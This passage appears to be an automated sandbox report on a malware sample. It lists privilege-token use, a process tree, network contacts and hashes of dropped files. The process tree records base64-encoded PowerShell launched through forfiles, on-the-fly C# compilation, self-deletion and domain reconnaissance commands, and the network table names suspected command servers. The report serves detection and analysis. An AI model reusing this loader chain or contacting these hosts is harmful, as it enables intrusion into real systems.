| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Restr.exe
"C:\Users\Admin\AppData\Local\Temp\Restr.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:734213 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20.tmp"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\iexpress.exe
iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\6D90.bin
C:\Windows\system32\makecab.exe
C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Columnsoftware.DDF"
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\A5C0.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\system32\cmd.exe
cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5BA0.bin0
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5BA0.bin0 > C:\Users\Admin\AppData\Local\Temp\5BA0.bin & del C:\Users\Admin\AppData\Local\Temp\5BA0.bin0"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\whoami.exe
whoami /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\7AD4.bin0 > C:\Users\Admin\AppData\Local\Temp\7AD4.bin & del C:\Users\Admin\AppData\Local\Temp\7AD4.bin0"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| UA | 87.120.36.210:443 | tcp | |
| US | 209.141.45.189:80 | 209.141.45.189 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 198.98.61.131:80 | 198.98.61.131 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| JP | 172.104.79.222:80 | 172.104.79.222 | tcp |
| RU | 213.183.56.140:8080 | 213.183.56.140 | tcp |
| VN | 125.212.217.197:80 | 125.212.217.197 | tcp |
| LV | 46.183.217.5:80 | 46.183.217.5 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| NL | 50.7.178.34:80 | tcp | |
| US | 172.104.208.190:80 | 172.104.208.190 | tcp |
| US | 8.8.8.8:53 | unavas.xyz | udp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| CR | 200.122.181.78:80 | 200.122.181.78 | tcp |
| NL | 51.15.76.56:9030 | 51.15.76.56 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| US | 199.249.230.114:80 | 199.249.230.114 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 67.11.225.49:8080 | tcp | |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| FR | 163.172.139.104:8080 | 163.172.139.104 | tcp |
| US | 199.249.230.142:80 | 199.249.230.142 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| DE | 178.254.31.125:80 | 178.254.31.125 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| NL | 93.174.93.133:80 | 93.174.93.133 | tcp |
| US | 199.249.230.115:80 | 199.249.230.115 | tcp |
| US | 198.98.61.131:80 | 198.98.61.131 | tcp |
| US | 199.249.230.102:80 | 199.249.230.102 | tcp |
| US | 199.249.230.103:80 | 199.249.230.103 | tcp |
| US | 73.222.93.39:9040 | 73.222.93.39 | tcp |
| HU | 91.219.238.221:80 | 91.219.238.221 | tcp |
| DE | 116.202.179.148:80 | 116.202.179.148 | tcp |
| SE | 193.189.100.202:80 | 193.189.100.202 | tcp |
| US | 199.249.230.103:80 | 199.249.230.103 | tcp |
| FR | 86.105.212.130:9030 | 86.105.212.130 | tcp |
| DE | 79.205.254.110:80 | 79.205.254.110 | tcp |
| ID | 195.123.237.161:80 | 195.123.237.161 | tcp |
| US | 199.249.230.168:80 | 199.249.230.168 | tcp |
| US | 199.249.230.113:80 | 199.249.230.113 | tcp |
| LV | 94.100.6.27:80 | 94.100.6.27 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| LU | 107.189.7.156:80 | 107.189.7.156 | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| US | 199.249.230.80:80 | 199.249.230.80 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 92.222.79.186:80 | 92.222.79.186 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| DE | 179.43.141.92:80 | 179.43.141.92 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| US | 185.220.103.120:80 | 185.220.103.120 | tcp |
| LU | 107.189.10.237:80 | 107.189.10.237 | tcp |
| CH | 195.206.105.217:80 | 195.206.105.217 | tcp |
| US | 199.249.230.85:80 | 199.249.230.85 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| ZA | 160.119.249.223:80 | 160.119.249.223 | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | tcp | |
| US | 199.249.230.144:80 | 199.249.230.144 | tcp |
| NL | 80.100.69.97:80 | 80.100.69.97 | tcp |
| US | 45.61.188.251:80 | 45.61.188.251 | tcp |
| US | 199.249.230.162:80 | 199.249.230.162 | tcp |
| CL | 37.235.52.67:80 | 37.235.52.67 | tcp |
| US | 199.249.230.106:80 | 199.249.230.106 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| US | 204.44.81.158:8080 | 204.44.81.158 | tcp |
| NL | 5.79.79.133:80 | 5.79.79.133 | tcp |
| US | 199.249.230.112:80 | 199.249.230.112 | tcp |
| CA | 158.69.205.247:9030 | 158.69.205.247 | tcp |
| US | 199.249.230.169:80 | 199.249.230.169 | tcp |
| DE | 185.216.179.206:80 | 185.216.179.206 | tcp |
| LV | 94.100.6.27:80 | 94.100.6.27 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| KG | 91.213.233.60:80 | 91.213.233.60 | tcp |
| NL | 212.83.167.220:9030 | 212.83.167.220 | tcp |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | tcp | |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | tcp | |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | tcp | |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| GB | 188.127.69.60:80 | tcp | |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| GB | 188.127.69.60:80 | tcp | |
| CA | 199.58.81.140:80 | tcp | |
| US | 199.249.230.66:80 | tcp | |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
Files
memory/304-54-0x000000000052E000-0x0000000000539000-memory.dmp
memory/304-55-0x000000000052E000-0x0000000000539000-memory.dmp
memory/304-56-0x0000000000230000-0x000000000023C000-memory.dmp
memory/304-58-0x0000000001000000-0x000000000106F000-memory.dmp
memory/304-57-0x0000000075C41000-0x0000000075C43000-memory.dmp
memory/304-59-0x0000000000240000-0x0000000000250000-memory.dmp
memory/304-65-0x0000000000270000-0x0000000000272000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
| MD5 | db9b19619a023808d90d8c33b3445017 |
| SHA1 | 382a05ad8f0efbcec4631b004a9eb1c0947c47cd |
| SHA256 | 37483ec746105f9d6669ad229d4f4b04098a6e7e90584d7adfc188f7866a066c |
| SHA512 | 1af7e5c6f0fe074a93da9c6e8cca7afd9e07c27870c69aacd49eb79acca74d349df12dc41589c8f2fc3c408915ccf6f2a321e50856e42cbec6736aed8ad13658 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 70f11d88a2c034021c1964b0d3553522 |
| SHA1 | 45dd2e2a689af1e23c637d5491bbf03036b96131 |
| SHA256 | 14b68c058cd1f1971bc1888b1506989df308226167e4b6128c1facaeef053c2e |
| SHA512 | 46a735df639d4fdc413325a4f4d29f6894ab05c86335df0055593be171dfe4c72ebdfb13b4e1901603f8425f328c81a2072e338e79c5393a2b1ff5a898a39e48 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | a93dac0c8b0a75f5c7dd20a9325f5d86 |
| SHA1 | eabf861ebe7cc22e938444e1c12e4e006190fe54 |
| SHA256 | f31460e823be9de1ce494a4837112166b5c52d3bb3b9b543db2ab36d7fb9fed4 |
| SHA512 | 27e29188dd432a3bef5a6b79b5546e3ffdedbb724def76ecab6e9ff72ef02a2124bd0bde728752e78e79512618ade0962eb7da52fdc666d44803a21f3a7f3f34 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
memory/1292-71-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp
memory/1292-72-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/1292-73-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1292-74-0x00000000025B0000-0x00000000025B2000-memory.dmp
memory/1292-75-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1292-76-0x00000000025B2000-0x00000000025B4000-memory.dmp
memory/1292-77-0x00000000025B4000-0x00000000025B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d61c2a7edf4b81f7be45de1e33d9fb64 |
| SHA1 | 505daf37edd55e9efe6ad032662bfdaaa788651c |
| SHA256 | 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d |
| SHA512 | 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3 |
memory/1640-80-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/1292-81-0x00000000025BB000-0x00000000025DA000-memory.dmp
memory/1640-83-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1640-84-0x0000000002340000-0x0000000002342000-memory.dmp
memory/1640-85-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/1640-86-0x0000000002342000-0x0000000002344000-memory.dmp
memory/1640-87-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1640-82-0x000000001B830000-0x000000001BB2F000-memory.dmp
memory/1640-88-0x000000000234B000-0x000000000236A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d61c2a7edf4b81f7be45de1e33d9fb64 |
| SHA1 | 505daf37edd55e9efe6ad032662bfdaaa788651c |
| SHA256 | 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d |
| SHA512 | 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3 |
memory/844-91-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/844-92-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/844-93-0x0000000002690000-0x0000000002692000-memory.dmp
memory/844-94-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp
memory/844-95-0x0000000002692000-0x0000000002694000-memory.dmp
memory/844-96-0x0000000002694000-0x0000000002697000-memory.dmp
memory/844-97-0x000000000269B000-0x00000000026BA000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline
| MD5 | 1f137f80c2a51641b19c6ab62739c7c7 |
| SHA1 | 780317fa83c473a066a2b950440cc487c922e793 |
| SHA256 | e8e9879453ff3967159dae041ea0269c2de114e6aeb7946098e332b7ff36854e |
| SHA512 | 4f8ee12f4ba7d25f2684a4ca844573366af8c7bbb811171178fff1f47643233311697f27c5bc8839ce230757bab3dcf7ae59163a280a63ccb7bb99cc7b927374 |
\??\c:\Users\Admin\AppData\Local\Temp\cjxp6gcr.0.cs
| MD5 | 7fceb996f934e8bda687cdd2bd46a9a7 |
| SHA1 | 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6 |
| SHA256 | fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e |
| SHA512 | 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp
| MD5 | 00ab387cf5240f9e079347f0fc570b9d |
| SHA1 | 0158ed109b684079468cd3c3e46baec04e623a3c |
| SHA256 | 65cae3a9bffd254b5f9246019f3cbd0bc0fc5df4bbeb4930d28912bdf030f5c9 |
| SHA512 | 1c3c00836c38e1b96314f2ae1aabfa3de362acedc035b74a2f314d347b1389e1011a33c47f67812f5a84d5a549ca31793b871996347d0b80c698feca0e46bce2 |
C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp
| MD5 | b56a0bebf61835e3f214da735ae84bf4 |
| SHA1 | 040276c15a8a87684e1ec3abd39997c9aba75114 |
| SHA256 | 8b016763de40b335e30228711944cf55dcc6456fc3d810f9ed97a7074c3baeeb |
| SHA512 | 7d32dc5daa6a6b0ae389bfad8646563e694914afc36785a65247939b28420a7aacaf8e078301dbada943ae62da54dd88e99a225f1e7170838cfdee652fd10fea |
C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.dll
| MD5 | 3063266ffdcfe2c4a0939b06ea3717b4 |
| SHA1 | b94790c56db20b47ae1b6519a05417923c0efa42 |
| SHA256 | eeaefce42beb6ba7172bf5d75002ba232dd1e59daabc0fc1a43ce03f53b55b74 |
| SHA512 | b31d97e6b6cdb3604b519d9c554deaaaa295b437a212a489b6262d44b9c43ba20918d2ae4fc6c060e1652e6390fbeb2ab964c64be93a4e6894bd60fd0c74a717 |
C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.pdb
| MD5 | 355cfdfd67fae9c87ea6e1a3955427ee |
| SHA1 | 88608dad2ee5c8bd4b6d65645571c76135d1d684 |
| SHA256 | 95be07ab865d625257dd8669b2bf95e1cf7a73022b545082d37c1b50d509b647 |
| SHA512 | 480cee09bb4440dda1e6ef244e0eb085dfaa44d7fcab65e067c8bde9fc8de2022d0b29d6407de358e1dd52aeb0c4bceb78fd30e15d625ee2c828f84288f2c787 |
\??\c:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline
